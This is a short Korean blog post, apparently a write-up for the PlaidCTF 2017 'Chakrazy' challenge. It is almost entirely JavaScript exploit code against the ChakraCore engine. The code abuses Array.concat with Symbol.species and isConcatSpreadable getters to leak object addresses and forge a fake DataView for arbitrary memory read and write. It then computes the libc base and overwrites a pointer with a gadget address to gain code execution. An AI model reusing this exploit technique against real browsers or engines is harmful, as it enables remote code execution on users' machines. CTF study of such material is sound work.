-
PCTF 2017 ChakrazyPwnable/CTF 2018. 12. 25. 00:14
FakeDataview 만들어서 익스하면된다.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104function set_dv(arr,lo,hi) {arr[0] = 56arr[4] = (lo - 574280) //+0x3c000arr[5] = hiarr[10] = loarr[11] = hiarr[12] = lo //ArrayBufferarr[13] = hiarr[14] = lo //bufferarr[15] = hi}function leak(addr) {var a = [1,2,3,4];var b = [5,6,7,8];var c = new Function();c[Symbol.species] = function() {p = [9,10,11,12];return p;};a.constructor = c;b.__defineGetter__(Symbol.isConcatSpreadable,function() {p[0] = addr;b[0] = addr;return true;});return a.concat(b);}function leak2(addr) {var a = [1,2,3,4];var b = [5,6,7,8];var c = new Function();c[Symbol.species] = function() {p = [9,10,11,12];return p;};a.constructor = c;b.__defineGetter__(Symbol.isConcatSpreadable,function() {p[0] = addr;b[0] = addr;return true;});return a.concat(b);}var result = new Uint32Array(2);var ab_one = new ArrayBuffer(8);var dv_one = new DataView(ab_one);var ab_temp = leak2(ab_one);result[0] = ab_temp[0];result[1] = ab_temp[1];te = '0x'+(result[1].toString(16)) + (result[0]).toString(16)console.log(te);var dv = [0];for(var i=0;i<16;i++)dv[i] = 0x0;var dv_temp = leak(dv);dv_temp[0] = dv_temp[0] - 0x84548+0x30; //- 0x90518result[0] = dv_temp[0];result[1] = dv_temp[1];var te = '0x'+(result[1].toString(16)) + (result[0]).toString(16)console.log(te);dv[0] = 0;dv[2] = dv_temp[0]+0x10;dv[3] = dv_temp[1];dv[4] = 0x38;dv[6] = dv_temp[0];dv[7] = dv_temp[1];dv[8] = 0x30;dv[10] = ab_temp[0];dv[11] = ab_temp[1];dv[14] = (dv_temp[0]+0x84548-0x30);dv[15] = dv_temp[1];var a_attack = [];for(var i=0;i<0x10;i++)a_attack[i] = i;var b = [dv_temp[0],dv_temp[1]];var c = new Function();c[Symbol.species] = function() {p = [9,10,11,12];return p;};a_attack.constructor = c;b.__defineGetter__(Symbol.isConcatSpreadable,function() {p[0] = {};return true;});var temp = (a_attack.concat(b))[8];var clib = [0,0];clib[0] = dv_one.getUint32.call(temp,0,true) - 0xd5db40;clib[1] = dv_one.getUint32.call(temp,4,true);//libc = clib[0] + 0x1628000var te = '0x'+(clib[1].toString(16)) + (clib[0]).toString(16)console.log(te);dv_one.setUint32.call(temp,16,clib[0]+0x1628000+0xf1147,true);dv_one.setUint32.call(temp,20,clib[1],true);dv_one.setUint32.call(temp,0,dv_temp[0]+0x84548-0x30+16-0xa0,true);dv.hasOwnProperty('AAAA');cs 'Pwnable > CTF' 카테고리의 다른 글
PCTF 2018 d8-dist (0) 2018.12.22 SECCON 2017 vm_no_fun (0) 2018.08.15 Codegate 2018 7ameBOX1 (0) 2018.05.21 RCTF 2018 Write up (2) 2018.05.21 Secuinside 2017 vvv (0) 2018.05.13